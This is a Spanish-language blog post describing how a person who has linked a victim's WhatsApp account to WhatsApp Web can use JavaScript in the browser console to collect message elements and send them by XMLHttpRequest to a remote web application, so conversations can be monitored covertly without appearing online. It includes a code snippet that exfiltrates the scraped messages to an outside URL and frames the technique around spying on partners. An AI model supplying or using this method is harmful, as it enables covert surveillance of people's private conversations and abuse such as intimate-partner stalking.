miércoles, 26 de septiembre de 2018

Obtener conversaciones de Whatsapp con JavaScript y monitorizarlas en tiempo real.

Whatsapp es la aplicación de mensajería más utilizada del mundo, y esto hace que muchas personas tengan ahí (toda) su vida, por lo que cualquier fuga de información que se produzca puede suponer un serio problema. Aunque el problema está en cuando los problemas de seguridad de Whatsapp no descienden, sino que crecen y de forma más sofisticada.


En este blog ya he ido comentando algunos grandes problemas. Por recapitular tenemos:


Ahora vamos a seguir dándole una vuelta de tuerca más, ya que si por cualquier motivo, una persona que nos quiera espiar Whatsapp, escanease con nuestro teléfono móvil el código QR de Whatsapp web desde su ordenador, podría monitorizar las conversaciones que tengamos sin necesidad de mirar Whatsapp Web.

Esto no es tan raro, ya que me han llegado casos de chicas a las que su novio les ha regalado un smartphone con Whatsapp ya instalado. No hace falta decir más.

Pues si vamos a Whatsapp Web y nos vamos a la consola tras pulsar en Inspeccionar elemento, podemos utilizar Java Script para obtener los mensajes.


Lo que hacemos es meter en la variable messages1 la instrucción document.getElementsByClassName para obtener las clases que contienen los mensajes de Whatsapp. 

Estos mensajes se van a guardar en un array, pero si los tratamos de mostrar, nos dará error porque,obviamente, son muchos. Es importante que especifiquemos qué elemento del array vamos a obtener y pasarlo a lenguaje HTML, ya que de lo contrario nos marcará que es un objeto span y no podremos visualizarlo.


Esto, si pasamos la variable a la función alert para comprobar si lo hemos hecho bien, veremos que saca el mensaje que ocupa la posición 26 dentro del array. Pero el problema es ese, que sacamos el mensaje, no quién lo ha dicho.


Dentro de Inspeccionar elemento, lo único que tendríamos que hacer es sacar la clase que guarda la fecha, hora y nombre de contacto que tenemos puesto a la persona que ha escrito el mensaje.

Esto lo mejoramos utilizando un bucle for que vaya incrementando en 1 los mensajes y del array y que los mande a una aplicación web que tengamos preparada. Hacer esto es tan sencillo como añadir las siguientes líneas.

var req = new XMLHttpRequest();
var URL = "[URL]" + messages1;
alert (URL); //Para probar que se ha almacenado correctamente la URL.
req.open("GET",URL,false);
req.send();

Los mensajes nos irán llegando y podremos monitorizarlos sin tener que estar mirando Whatsapp Web todo el rato. Es esto lo que lo hace más peligroso, ya que no apareceríamos "On line" por lo que ningún amigo o familiar de la víctima sospecharía.

Este post lo añado a la recopilación de fallos de Whatsapp. Y para mí sí, es un fallo, debería de denegar la posibilidad de ejecutar código Java Script, pero ya sabemos que a Whatsapp todo lo que sea reducir la privacidad le pone bastante.

¿Hackeamos el Mundo?

No hay comentarios:

Publicar un comentario

Related Posts Plugin for WordPress, Blogger...

Entrada destacada

El server me sabe a poco.

Soy un fanático del Rock y de Debian . (Creo que voy a inventar Rockbian, que suena bien y todo xD) Llevaba tiempo queriendo unir estos 2 c...